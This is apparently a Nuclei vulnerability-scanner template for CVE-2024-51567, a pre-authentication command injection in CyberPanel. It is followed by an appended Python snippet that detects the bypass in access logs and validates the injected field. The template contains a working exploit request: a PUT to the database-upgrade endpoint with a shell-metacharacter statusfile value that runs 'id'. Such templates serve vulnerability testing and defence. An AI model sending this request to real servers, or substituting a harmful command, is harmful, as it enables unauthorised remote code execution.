id: CVE-2024-51567

info:
  name: CyberPanel v2.3.6 Pre-Auth Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    upgrademysqlstatus in databases/views.py in CyberPanel (aka Cyber Panel) before 5b08cd6 allows remote attackers to bypass authentication and execute arbitrary commands via /dataBases/upgrademysqlstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: Attackers can exploit this vulnerability by crafting malicious requests that bypass authentication controls, allowing them to inject and execute arbitrary commands on the underlying server.
  reference:
    - https://community.cyberpanel.net/t/cyberpanel-2-1-remote-code-execution-rce/31760
    - https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce
    - https://cwe.mitre.org/data/definitions/420.html
    - https://cwe.mitre.org/data/definitions/78.html
    - https://cyberpanel.net/KnowledgeBase/home/change-logs/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-51567
    cwe-id: CWE-306
    epss-score: 0.86725
    epss-percentile: 0.99716
    cpe: cpe:2.3:a:cyberpanel:cyberpanel:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cyberpanel
    product: cyberpanel
    shodan-query: html:"CyberPanel"
  tags: cve,cve2024,cyberpanel,rce,intrusive,kev,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        PUT /dataBases/upgrademysqlstatus HTTP/1.1
        Host: {{Hostname}}
        X-CSRFToken: {{csrftoken}}
        Content-Type: application/json
        Referer: {{RootURL}}
        Cookie: csrftoken={{csrftoken}}

        {"statusfile":"/dev/null; id; #","csrftoken":"{{csrftoken}}"}

    extractors:
      - type: regex
        part: header
        name: csrftoken
        internal: true
        group: 1
        regex:
          - csrftoken=([A-Za-z0-9]+)

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "error_message"
          - "requestStatus"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bcba6b30e70ae550360ab54bdc8ea97e5b3cebb9ab7da3f1bb5e5f75618b58ef022021be0598c3050a747c71e9d8ba5ccaff95d4480577c9065857f04d090cbeccc7:922c64590222798bb761d5b6d8e72950
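As an added defender-side example (not part of this template or of CyberPanel's code), the Python below flags the method mismatch the description relies on, a non-POST request to /dataBases/upgrademysqlstatus, which secMiddleware did not inspect, in constructed access-log lines, and shows the server-side validation a statusfile value needs before it can ever reach a shell. The log format, the sample lines and the function names are assumptions; only the endpoint and the "/dev/null; id; #" value come from the template.

```python
import json
import re

# Endpoint named in the advisory. In affected versions secMiddleware only
# inspected POST requests, so a non-POST hit on this path is the bypass signature.
TARGET_PATH = "/dataBases/upgrademysqlstatus"

# Apache/nginx combined log format (assumed); sample lines are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that let a value escape a shell command (CWE-78).
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")


def flag_bypass_requests(log_lines):
    """Return (ip, method, status) for every non-POST request to the endpoint."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line, not our format
        path = m.group("path").split("?", 1)[0]
        if path.lower() == TARGET_PATH.lower() and m.group("method") != "POST":
            hits.append((m.group("ip"), m.group("method"), int(m.group("status"))))
    return hits


def statusfile_is_safe(body):
    """Validation a handler should apply to the JSON 'statusfile' field:
    a plain absolute path with no shell metacharacters and no traversal."""
    try:
        value = json.loads(body).get("statusfile", "")
    except (ValueError, AttributeError):
        return False  # not a JSON object at all
    if not isinstance(value, str) or not value.startswith("/"):
        return False
    return SHELL_META.search(value) is None and ".." not in value


# Constructed sample traffic: a GET, the PUT bypass, and a legitimate POST.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Oct/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 5120',
    '203.0.113.7 - - [27/Oct/2024:10:01:03 +0000] "PUT /dataBases/upgrademysqlstatus HTTP/1.1" 200 311',
    '198.51.100.4 - - [27/Oct/2024:10:05:44 +0000] "POST /dataBases/upgrademysqlstatus HTTP/1.1" 200 80',
]

if __name__ == "__main__":
    print(flag_bypass_requests(SAMPLE_LOG))
    print(statusfile_is_safe('{"statusfile":"/dev/null; id; #"}'))
```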